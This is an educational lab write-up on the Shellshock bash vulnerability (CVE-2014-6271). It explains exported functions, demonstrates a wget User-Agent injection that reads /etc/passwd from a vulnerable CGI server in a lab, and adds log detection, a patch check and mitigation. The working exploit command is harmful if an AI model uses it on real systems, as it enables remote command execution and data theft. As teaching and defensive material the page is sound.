CVE-2014-6271 Shellshock
Background and Vulnerability
# Shell variables
t="hi there"
echo $t
# Not visible in a subshell
bash
echo $t
exit
# Made available to the subshell by exporting it
export t
bash
echo $t
exit
# Stop exporting
export -n t
# Function declaration
fn() { echo "test"; }
fn
# Functions are not passed to a subshell by default
bash
fn
exit
# Export the function with -f
export -f fn
bash
fn
exit
# Exported functions are converted to environment variables, and the child
# bash 'executes' the definition when it imports them
# Consider an ordinary (exported) variable whose value merely looks like one
fn='() { echo "direct" ; }'
export fn
# This does not define a function in the current shell, but a vulnerable
# subshell mistakes the value for an exported function and so executes it
bash
fn
exit
# Last piece: when importing a function, a vulnerable bash executes the
# complete string associated with the definition, not just the function body.
# Compare the interactive form
fn() { echo "test"; }; echo "this is bad";
# with the same thing smuggled in through the environment
export ex='() { echo "function ex" ; }; echo "this is bad"; '
bash
exit
# The value is mistaken for an exported function, and the trailing echo runs
# as soon as the subshell starts, before any script does.
# An exploit:
# Linux vulnerable to shellshock, with apache, insecure default with CGI enabled and
# a bash CGI script
Above is extracted and modified from "What does env x='() { :;}; command' bash do and why is it insecure?".
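To make the exported-function mechanism above concrete, here is an added shell example (not code from the original page): it shows the environment entry a current bash creates for an exported function, confirms that a plain variable whose value merely looks like a function is no longer imported by a patched bash, and checks that a genuinely exported function still crosses into the child. It assumes a bash binary on PATH; the function name fn and its body are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original page): how an exported function travels
# through the environment, and what a patched bash does with a look-alike value.
# Assumes a bash binary on PATH; the names fn and "direct"/"test" are constructed.

# Print the environment variable name(s) a patched bash creates for an exported
# function. Current bash stores them under a BASH_FUNC_<name> prefix (the suffix
# differs between builds: "%%" upstream, "()" in some older vendor patches).
exported_function_env_names() {
    bash -c 'fn() { echo "test"; }; export -f fn; env' \
        | grep '^BASH_FUNC_fn' | cut -d= -f1
}

# A plain variable whose value starts with "() {" is what the background section
# calls "confused with an exported function". A patched bash treats it as an
# ordinary string, so calling fn in the child fails with "command not found" (127).
plain_var_is_imported() {
    if env fn='() { echo "direct"; }' bash -c 'fn' >/dev/null 2>&1; then
        echo imported          # only an unpatched bash gets here
    else
        echo "not imported"
    fi
}

# A function exported the supported way (export -f) still works in the child.
exported_function_runs() {
    bash -c 'fn() { echo "test"; }; export -f fn; bash -c fn'
}

exported_function_env_names
plain_var_is_imported
exported_function_runs
```

Run it under an old, unpatched bash and the second function reports "imported", which is exactly the behaviour the transcript above relies on; under any bash shipped since the fix it reports "not imported" while the third function still prints "test", showing that the fix kept the feature and removed only the ambiguity.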
The Exploit (Demo)
The demo outlined below exploits a web server running a version of bash vulnerable to shellshock.
The server is running apache and CGI, using a bash script as the executable CGI script. The result of the exploit will
be the transmission, from server to attacking client, of /etc/passwd.
- Run the Ubuntu804Server1 and Kali1 virtual machines.
- Some background on CGI: the CGI protocol enables a web server to serve dynamic content via any server-side executable.
The http protocol is used by a browser to communicate with a server. The server understands the http request
and sees that dynamic content is requested via an executable program. The server creates an environment
(setting up environment variables etc.) and then runs the target executable.
To see this in action, point the Kali1 browser at environment.cgi.
The response, displayed in the browser, is the environment created by Apache for the execution of environment.cgi.
The code is in Ubuntu804Server1:/usr/lib/cgi-bin/environment.cgi, or you can view it here.
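The mapping from request headers to environment variables is the part of CGI that matters for this attack, so here is an added shell example (not the page's environment.cgi and not Apache's code) that reproduces the rule the CGI specification (RFC 3875) prescribes: a header "Name: value" becomes HTTP_NAME=value, with the name upper-cased and hyphens turned into underscores. The header lines it feeds in are constructed samples.

```shell
#!/bin/sh
# Added example (not from the original page): how a CGI server derives
# environment variables from request headers, per RFC 3875 section 4.1.18.
# The sample request headers below are constructed.

# Map one header name to its CGI meta-variable name: User-Agent -> HTTP_USER_AGENT.
cgi_env_name() {
    printf 'HTTP_%s\n' "$(printf '%s' "$1" | tr 'a-z' 'A-Z' | tr '-' '_')"
}

# Read "Name: value" header lines on stdin and print the NAME=value assignments
# the CGI script will find in its environment.
cgi_headers_to_env() {
    while IFS= read -r line; do
        name=${line%%:*}
        value=$(printf '%s' "${line#*:}" | sed 's/^ *//')   # strip leading blanks
        printf '%s=%s\n' "$(cgi_env_name "$name")" "$value"
    done
}

# Constructed headers, as a browser or "wget -U ArnoldsBrowser" would send them.
sample_headers() {
    printf 'Host: 192.168.0.100\nUser-Agent: ArnoldsBrowser\nAccept: */*\n'
}

sample_headers | cgi_headers_to_env
```

Apache applies this mapping to every request header, which is why any header value the client controls ends up, unfiltered, in the environment of the CGI script, and why the User-Agent header is a convenient carrier in the demo below.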
- The vulnerable application is a simple 'hello world' bash script.
Point the Kali1 browser at shellshock.cgi to see it function normally.
The code is in Ubuntu804Server1:/usr/lib/cgi-bin/shellshock.cgi, or you can view it here.
- wget is a standard unix command (man wget) which plays the role of a browser. It can issue an http request
and save the response in a file. Useful for scraping a website (downloading the website contents).
Try
wget http://192.168.0.100/cgi-bin/shellshock.cgi
from Kali.
- wget can also send http headers, which in the case of a CGI request are used to set environment variables. The -U option to wget
lets one specify the http User-Agent header sent to the server. This, in turn, becomes the HTTP_USER_AGENT environment variable.
Try
wget -U "ArnoldsBrowser" http://192.168.0.100/cgi-bin/environment.cgi
from Kali and note the HTTP_USER_AGENT environment variable.
- The following combines the vulnerability with the CGI discussion above to fetch the passwd file from the server.
wget -U "() { :;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" http://192.168.0.100/cgi-bin/shellshock.cgi
The Content-type line followed by a blank line forms a valid CGI response header, so Apache relays the command output to the client.
The CGI scripts used are /usr/lib/cgi-bin/environment.cgi and /usr/lib/cgi-bin/shellshock.cgi.
Above is modified from Attacks and Patches.
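From the defender's side, the request above leaves a distinctive trace: the "() {" prefix that bash used to recognise a function definition. The following added shell example (not part of the original page) scans a web server access log for that marker and reports the matching requests. The log excerpt is a constructed sample in Apache combined format, in which the User-Agent is the last quoted field.

```shell
#!/bin/sh
# Added example (not from the original page): detect Shellshock probes in an
# Apache access log by the "() {" marker in logged header values.
# The log lines below are constructed samples.

# Keep only lines carrying "() {" (optional spaces allowed between ")" and "{"),
# the sequence a vulnerable bash took as the start of an exported function.
shellshock_probe_lines() {
    grep -E '\(\) *\{'
}

# Count matching lines read from stdin.
shellshock_probe_count() {
    shellshock_probe_lines | wc -l | tr -d ' '
}

# Constructed excerpt: an ordinary request, a probe shaped like the wget
# command above, and a benign request whose query string happens to contain
# braces but no "() {" sequence.
sample_access_log() {
    cat <<'EOF'
192.168.0.50 - - [25/Sep/2014:10:00:01 +0000] "GET /cgi-bin/shellshock.cgi HTTP/1.1" 200 12 "-" "ArnoldsBrowser"
192.168.0.50 - - [25/Sep/2014:10:00:05 +0000] "GET /cgi-bin/shellshock.cgi HTTP/1.1" 200 1423 "-" "() { :;}; /bin/cat /etc/passwd"
192.168.0.51 - - [25/Sep/2014:10:00:09 +0000] "GET /cgi-bin/environment.cgi?q={x} HTTP/1.1" 200 980 "-" "Mozilla/5.0"
EOF
}

sample_access_log | shellshock_probe_lines
```

Two caveats for real use: the combined log format records only the User-Agent and Referer headers, so a payload carried in another header (Cookie, or a custom one) is invisible to this scan unless full headers are logged or a web application firewall inspects the request; and a successful probe is the one with a 200 status and an unusually large response size, as in the second sample line, so the status and size fields are worth checking alongside the match.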
Notes
- This version of Ubuntu comes with CGI enabled by default for /cgi-bin/. Not a secure default!
- How bad can it get? The injected commands run with the web server's privileges, so an attacker can cause the server to download and install code.
- The above is not the only possible exploit against this vulnerability.
Mitigation
Patch! Most versions of Linux have bash patched at this point.
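To confirm that a given system is in fact patched, here is an added shell example (not part of the original page) that wraps the widely published one-line test for this CVE, the same env x='() { :;}; ...' construction named in the background section's source, in a function that reports "vulnerable" or "patched" for a chosen bash binary. It assumes bash is on PATH, or that a path to the binary to test is passed as the first argument.

```shell
#!/bin/sh
# Added example (not from the original page): local check for CVE-2014-6271.
# An environment variable holds a function definition followed by an extra
# command; a vulnerable bash runs the extra command while importing the
# function, a patched bash ignores it. Assumes bash on PATH or a path in $1.

shellshock_check() {
    shell=${1:-bash}
    # "echo vulnerable" sits after the function body; it must not run on import.
    # stderr is discarded because some patched builds print a warning there.
    out=$(env x='() { :;}; echo vulnerable' "$shell" -c 'echo this is a test' 2>/dev/null)
    case "$out" in
        *vulnerable*) echo vulnerable ;;
        *)            echo patched ;;
    esac
}

# Print the bash version next to the result so the check can be recorded.
shellshock_report() {
    shell=${1:-bash}
    printf 'bash %s: %s\n' "$("$shell" -c 'echo "$BASH_VERSION"')" "$(shellshock_check "$shell")"
}

shellshock_report
```

Note that this exercises only the original flaw; the first fix was incomplete and follow-up fixes shipped shortly after, so treat a "patched" result as necessary but not sufficient and also confirm the installed bash package version against the distribution's advisory.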
Other references